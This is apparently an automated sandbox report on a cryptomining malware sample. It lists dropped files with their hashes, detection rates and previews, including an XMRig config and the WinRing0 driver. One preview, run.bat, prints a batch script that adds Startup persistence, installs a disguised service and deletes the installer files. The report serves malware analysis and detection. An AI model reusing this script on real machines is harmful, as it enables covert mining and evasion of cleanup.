                                                                                                                                                                                                  SHA-512:9A71825A4E111C89E193F799F5CD0F38BF753137BF669040254EB5ECFBEB1E7FB161451320592832381B6AE7A95B015EF8E9192AB10AD41E113BAD35DDE7D15F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d......].........."..........t......,..........@.........................................`...@...............@.............................h...|.......t........i..............|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc................j..............@..@.reloc..|...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\WinRing0x64.sys

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14544
                                                                                                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\Wmiic.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):373760
                                                                                                                                                                                                  Entropy (8bit):6.905823705092686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:OI6VyDGb+HiFr4kchE18dkuCj7jLwcYBQkMH9O1BNI/H9O1BNIgqH9O1BNIVH9Oa:OIJDGb+Hiu9hE18dkxfCMo7I/o7Igqok
                                                                                                                                                                                                  MD5:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  SHA1:8AB2B0DDC897603344DE8F1D4CC01AF118A0C543
                                                                                                                                                                                                  SHA-256:644C9745D1D2F679DB73FCB717DD37E180E19D5B0FC74575E4CEFE4F543F2768
                                                                                                                                                                                                  SHA-512:C30D46781B17C4BB0610D3AF4B5ACC223394D02F9FBB1FBB55811AE2EFE49FD29A7E9626737C4B24194C73C58FE1B577A858559A7E58D93C3660AC680F19EAF8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"1P.C_..C_..C_..;...C_..;...C_...$..C_..C^.YC_..;...C_......C_..;...C_.Rich.C_.........................PE..d...]..Y..........#......D...l................@............................. ..........................................................................h....P..."...................................................................`.. ............................text...4B.......D.................. ..`.rdata.......`.......H..............@..@.data...dC......."..................@....pdata..."...P...$..................@..@.rsrc................"..............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\Wrap.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):371200
                                                                                                                                                                                                  Entropy (8bit):6.048766722102581
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:8mCYYQQf7AtHFFrZPzGa+oh8PXDtkRrCK1vHkk:8zYKMzv+oiPRkh
                                                                                                                                                                                                  MD5:39ADB356036E91008843B83EFB61131D
                                                                                                                                                                                                  SHA1:59A38A196A2AA4C90100B1B8CC806E5582E0D4DE
                                                                                                                                                                                                  SHA-256:1CF2BDB1CDD34BB50D60F21B8208041913747B8DECA5F26AA187D2E8C0E9A105
                                                                                                                                                                                                  SHA-512:E606B15EE26D78B16851EC955A6C80759919937AB19C9B7B69D52747D0170524EE595F7FF15D881A412B45865E92439DA9F3E5DCEEE004529BBF186A8510264A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ui.1...1...1...%c..;...%c.."...%c......c}.. ...c}..;...c}..a...%c..2...1........}..0....}D.0...1.,.0....}..0...Rich1...........................PE..d....@.e.........."......N...t...... l.........@..........................................`.................................................Lq..(................ ..............(....8...............................8..8............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data... -...........n..............@....pdata... ......."..................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Tasks\config.json

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6063
                                                                                                                                                                                                  Entropy (8bit):4.010190835138922
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CtWTGyHTrTb1DoCIjYkL6fuLujuAuHutjQHhjQHcDkF9RqDp:LhbBoCIjYkL0IujuAuHutjshjscDkFQ
                                                                                                                                                                                                  MD5:4B87D69D4C9A02A8217E2CC250269A1E
                                                                                                                                                                                                  SHA1:D3DAE3E28BD095D503048F4CED289AEB8B8DCFD4
                                                                                                                                                                                                  SHA-256:BD6ACE239D1619D5498652706DA2A3E42F31C6C4DB452E6751900E34B930D212
                                                                                                                                                                                                  SHA-512:1F79D5E5C4AE506617E583AB3E3E55054864615E5A5E3737FB272287E907D35FD45A4D1D81634C404864A0896FAD4635A0975F371A971250811BC71D6467E249
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\config.json, Author: Joe Security
                                                                                                                                                                                                  Preview:{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "max-cpu-usage": null,. "memory-pool": false,. "yield": true,. "force-autoconfig": false,. "max-threads-hint": 50,. "asm": true,. "argon2-impl": null,. "argon2": [0],. "cn": [. [1, 0]. ],. "cn-heavy":

                                                                                                                                                                                                  C:\Windows\Tasks\run.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):706
                                                                                                                                                                                                  Entropy (8bit):5.076298278563438
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:sp+bOAraVM1t2c/DgfoCE3ot0JUyqfoCE3tt2sitE3kwEeRgh76AN1yMP6:sp+r2VM/Uf13t0Uf1Etlit0Eey1ZP6
                                                                                                                                                                                                  MD5:583985C24053B8EC1AF7F56D6641EF5D
                                                                                                                                                                                                  SHA1:F3663F96C00B6117620A5B932B220A5B71099606
                                                                                                                                                                                                  SHA-256:617C9DE31DDC54DF3A549858B8BD303E17DB7152FA0A2F8F9AC3C2BACECB3AFE
                                                                                                                                                                                                  SHA-512:9CFCF465AA9DBC960884013FFF41F5264E82A86C6968333CAEB3CA06C0D5E413F58BA0B26BA520EFFF755FEFB71398DC0810E8F935CAD6A74BCAA18554FB326D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:echo off..copy "c:\windows\tasks\MicrosoftPrt.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"..cd C:\windows\tasks..TIMEOUT /T 1 /NOBREAK..start "" "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe..TIMEOUT /T 1 /NOBREAK..start "" "C:\windows\tasks\wmiic" start WMService..TIMEOUT /T 2 /NOBREAK..net start WMService..start "" "C:\windows\tasks\1.exe"....del /f C:\windows\tasks\run.bat..del /f C:\programdata\migrate.exe..del /f C:\programdata\mig.exe..del /f C:\programdata\mig.rdp.exe..del /f C:\programdata\mig_rdp.exe..del /f C:\users\mig_rdp.exe..del /f C:\users\mig.rdp.exe..del /f C:\users\mig.exe..del /f C:\programdata\ru.bat..del /f C:\programdata\st.bat..

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\VCRUNTIME140.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89752
                                                                                                                                                                                                  Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
                                                                                                                                                                                                  MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                  SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                  SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                  SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.D.x.D.x.D..AD.x.D..=D.x.D.x.D.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx.QD.x.Dx..E.x.DRich.x.D........PE..d....}.Y.........." .........T...............................................`.......Y....`A........................................p...4............@.......0..(.... ...>...P..p.......8...........................@................................................text...$........................... ..`.rdata...6.......8..................@..@.data...0.... ......................@....pdata..(....0......................@..@.rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_bz2.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):84040
                                                                                                                                                                                                  Entropy (8bit):6.41469022264903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
                                                                                                                                                                                                  MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
                                                                                                                                                                                                  SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
                                                                                                                                                                                                  SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
                                                                                                                                                                                                  SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.1.).b.).b.).b.Qib.).b.A.c.).bM.=b.).b.A.c.).b.A.c.).b.A.c.).bD@.c.).b.O.c.).b.).b.).bD@.c.).bD@.c.).bD@.b.).bD@.c.).bRich.).b................PE..d.....].........." .........f......t........................................p.......a....`.............................................H............P.......@..(.......H....`......p...T...............................................8............................text...>........................... ..`.rdata..~A.......B..................@..@.data........0......................@....pdata..(....@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):181248
                                                                                                                                                                                                  Entropy (8bit):6.178135125133477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:8pixG4j9Sfl+l1wYz6GQXuyLe//qaVnTOk0Dxl4l5S7QkSTLkKzdsR8LXnfQ:8pOYfl41w8pSe/7nTw74btkSTLLzdsOL
                                                                                                                                                                                                  MD5:77B5D28B725596B08D4393786D98BD27
                                                                                                                                                                                                  SHA1:E3F00478DE1D28BC7D2E9F0B552778BE3E32D43B
                                                                                                                                                                                                  SHA-256:F7A00BA343D6F1EA8997D95B242FBBD70856EC2B98677D5F8B52921B8658369C
                                                                                                                                                                                                  SHA-512:D44415D425F7423C3D68DF22B72687A2D0DA52966952E20D215553AA83DE1E7A5192EC918A3D570D6C2362EB5500B56B87E3FFBC0B768BFA064585AEA2A30E9D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`.....C...C...C.yMC...C.t.B...C.n#C...C.t.B...C.t.B...C.t.B...C.y.B...Cdu.B...C...CN..Cut.B...C.yKC...Cut.B...Cut!C...Cut.B...CRich...C........PE..d...^..e.........." .........@...............................................0............`..........................................f..h...xf............................... ......@L..............................`L..8............................................text............................... ..`.rdata..:...........................@..@.data...h].......0...v..............@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_ctypes.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):123464
                                                                                                                                                                                                  Entropy (8bit):5.886703955852103
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
                                                                                                                                                                                                  MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
                                                                                                                                                                                                  SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
                                                                                                                                                                                                  SHA-256:9459D246DF7A3C638776305CF3683946BA8DB26A7DE90DF8B60E1BE0B27E53C4
                                                                                                                                                                                                  SHA-512:229896DA389D78CBDF2168753ED7FCC72D8E0E62C6607A3766D6D47842C0ABD519AC4F5D46607B15E7BA785280F9D27B482954E931645337A152B8A54467C6A5
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..4..4..4..L@..4..\..4..\..4..\..4..\..4..]..4..R..4..R..4..]..4..4.i4..]..4..]..4..],..4..]..4.Rich.4.........PE..d.....].........." .................]....................................................`..........................................`......$a..........................H...........0...T...............................................`............................text............................... ..`.rdata..0l.......n..................@..@.data....>.......:...l..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_hashlib.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):45640
                                                                                                                                                                                                  Entropy (8bit):5.996546047346997
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:8skeCps0iszzPFrGE/CBAdIPGV03ju774xxIGsIx7WDG4yw:81eCpLzDBZ+AdIPmYju7OxIGsIxWyw
                                                                                                                                                                                                  MD5:A6448BC5E5DA21A222DE164823ADD45C
                                                                                                                                                                                                  SHA1:6C26EB949D7EB97D19E42559B2E3713D7629F2F9
                                                                                                                                                                                                  SHA-256:3692FC8E70E6E29910032240080FC8109248CE9A996F0A70D69ACF1542FCA69A
                                                                                                                                                                                                  SHA-512:A3833C7E1CF0E4D181AC4DE95C5DFA685CF528DC39010BF0AC82864953106213ECCFF70785021CCB05395B5CF0DCB89404394327CD7E69F820D14DFA6FBA8CBA
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..&v.uv.uv.u...ur.u$..tt.u$..t}.u$..t~.u$..tt.u...tt.u.ts.uv.u..u.tw.u.tw.u.iuw.u.tw.uRichv.u................PE..d.....].........." .....@...Z......X2...............................................7....`..........................................u..P...@v..........................H............X..T...........................`X...............P...............................text....?.......@.................. ..`.rdata..p3...P...4...D..............@..@.data...h............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_lzma.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):252488
                                                                                                                                                                                                  Entropy (8bit):6.080982550390949
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:bkHDwqjhhwYbOqQNEkT/4OQhJwAbHoqLNvka/gOFhUw6b4qCNxkV/3OdhAWwPbGE:bd7/IbtSKOt
                                                                                                                                                                                                  MD5:37057C92F50391D0751F2C1D7AD25B02
                                                                                                                                                                                                  SHA1:A43C6835B11621663FA251DA421BE58D143D2AFB
                                                                                                                                                                                                  SHA-256:9442DC46829485670A6AC0C02EF83C54B401F1570D1D5D1D85C19C1587487764
                                                                                                                                                                                                  SHA-512:953DC856AD00C3AEC6AEAB3AFA2DEB24211B5B791C184598A2573B444761DB2D4D770B8B807EBBA00EE18725FF83157EC5FA2E3591A7756EB718EBA282491C7C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0d..^7..^7..^7..7..^7.._6..^7..[6..^7..Z6..^7..]6..^7Q._6..^7.._6..^7.._7..^7Q.S6..^7Q.^6..^7Q..7..^7Q.\6..^7Rich..^7........PE..d.....].........." .................6..............................................o*....`............................................L.......x.......................H.......$...@...T............................................... ............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_queue.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28232
                                                                                                                                                                                                  Entropy (8bit):6.051366978773049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bp/aC60HGTPk/ltSA/6rCbCnA/cEXEz65D1IGqUrnYPLxDG4y8xxzzI:bH60HGw/b/6rCb9iKD1IGqUrWDG4yCI
                                                                                                                                                                                                  MD5:44B72E0AD8D1E1EC3D8722088B48C3C5
                                                                                                                                                                                                  SHA1:E0F41BF85978DD8F5ABB0112C26322B72C0D7770
                                                                                                                                                                                                  SHA-256:4AA1BBDE1621C49EDAB4376CF9A13C1AA00A9B0A9905D9640A2694EF92F77D5E
                                                                                                                                                                                                  SHA-512:05853F93C6D79D8F9C96519CE4C195B9204DF1255B01329DEAA65E29BD3E988D41454CD305E2199404F587E855737879C330638F2F07BFF11388A49E67BA896C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........k...k...k.......k......k......k......k......k..u....k......k...k..k..u....k..u....k..u.r..k..u....k..Rich.k..................PE..d.....].........." .........8............................................................`..........................................B..L...\B..d....p.......`.......T..H.......l... 3..T............................3...............0..(............................text............................... ..`.rdata.......0......."..............@..@.data........P.......>..............@....pdata.......`.......B..............@..@.rsrc........p.......F..............@..@.reloc..l............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_socket.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):78920
                                                                                                                                                                                                  Entropy (8bit):6.061178831576516
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:KzMe79sDb+eGm08Vr5lcDAB9/s+7+pkaOz3CkNA9y1IGVwCyMPbi:de79u8/GFmAB9/se+pROz3jN1IGVw+Pm
                                                                                                                                                                                                  MD5:D6BAE4B430F349AB42553DC738699F0E
                                                                                                                                                                                                  SHA1:7E5EFC958E189C117ECCEF39EC16EBF00E7645A9
                                                                                                                                                                                                  SHA-256:587C4F3092B5F3E34F6B1E927ECC7127B3FE2F7FA84E8A3D0C41828583BD5CEF
                                                                                                                                                                                                  SHA-512:A8F8FED5EA88E8177E291B708E44B763D105907E9F8C9E046C4EEBB8684A1778383D1FBA6A5FA863CA37C42FD58ED977E9BB3A6B12C5B8D9AB6EF44DE75E3D1E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._....._...^.._...Z..._...[..._...\.._.a.^.._...^.._...^.B._.a.R..._.a._..._.a..._.a.]..._.Rich.._.................PE..d.....].........." .....x..........h........................................`.......2....`.............................................P...0........@.......0..........H....P.........T...........................@................................................text....v.......x.................. ..`.rdata...v.......x...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\_ssl.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117832
                                                                                                                                                                                                  Entropy (8bit):6.052642675957794
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:x3xozhUCVgMUGSo5iY0nx2bsxSV3QilzQmxLZIG47HZ:p6zh72PGz0nxrmVG
                                                                                                                                                                                                  MD5:8EE827F2FE931163F078ACDC97107B64
                                                                                                                                                                                                  SHA1:149BB536F3492BC59BD7071A3DA7D1F974860641
                                                                                                                                                                                                  SHA-256:EAEEFA6722C45E486F48A67BA18B4ABB3FF0C29E5B30C23445C29A4D0B1CD3E4
                                                                                                                                                                                                  SHA-512:A6D24E72BF620EF695F08F5FFDE70EF93F42A3FA60F7C76EB0F521393C595717E05CCB7A61AE216C18FE41E95FB238D82637714CF5208EE8F1DD32AE405B5565
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0.u.0.u.0.u.9...6.u.b.t.2.u.b.p.<.u.b.q.8.u.b.v.2.u..t.6.u.U.t.7.u.0.t.C.u..x.2.u..u.1.u...1.u..w.1.u.Rich0.u.........PE..d.....].........." ................................................................K.....`..........................................S..d...4T..........................H...........`...T............................................................................text...Q........................... ..`.rdata.............................@..@.data...P4...........h..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\base_library.zip

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):841697
                                                                                                                                                                                                  Entropy (8bit):5.484547317597865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:fhidp/tosQNRs54PK4IMEVw59bfCEA3TR32Q:fhidp/tosQNRs54PK4Ia96h
                                                                                                                                                                                                  MD5:E187FCE3F6D3F4BA450630147421A885
                                                                                                                                                                                                  SHA1:18241F2097F7D53CFB6B118FAE1F9CD31D169D07
                                                                                                                                                                                                  SHA-256:1F908E12FBA42AF4AD0ADE6FA7F1DBC617AFE7837271911056AF266D895E596A
                                                                                                                                                                                                  SHA-512:7837A3B28993422D067643EFE17C5F573DBD4C4B3E6D915E691E7557C259146A3FDDB104DA5306B63BE59A81446D1DFEA5317B5E62CBCE6A5AAA8DC700B42874
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\certifi\cacert.pem

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):290282
                                                                                                                                                                                                  Entropy (8bit):6.048183244201235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:QW1H/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5Np:QWN/TRJLWURrI55MWavdF0L
